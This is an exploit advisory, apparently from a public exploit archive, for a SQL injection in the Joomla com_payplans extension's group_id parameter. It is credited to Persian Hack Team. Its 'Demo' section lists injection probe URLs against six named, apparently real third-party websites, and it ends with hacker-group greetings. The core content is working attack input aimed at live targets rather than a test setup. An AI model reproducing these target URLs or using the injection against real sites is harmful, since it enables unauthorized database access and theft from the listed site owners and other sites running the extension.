###################### # Exploit Title : Joomla com_payplans - SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/payplans # Category: [ Webapps ] # Tested on: [ Win ] # Version: 3.3.6 # Date: 2016/06/08 ###################### # # PoC: # group_id Parameter Vulnerable To SQL # Demo : # http://www.cittanuvola.com/index.php?option=com_payplans&group_id=4%27 # http://www.gifa.org.za/index.php?option=com_payplans&view=plan&task=subscribe&group_id=1%27 # http://www.sigef.net/index.php?option=com_payplans&view=plan&task=subscribe&group_id=1%27 # http://australianteachers.com.au/index.php?option=com_payplans&group_id=1%27 # http://www.centralvalleysom.org/index.php?option=com_payplans&view=plan&task=subscribe&group_id=6%27 # http://powermail4joomla.com/index.php?option=com_payplans&group_id=5%27 # Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk ###################### # Discovered by : Mojtaba MobhaM # Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir #####################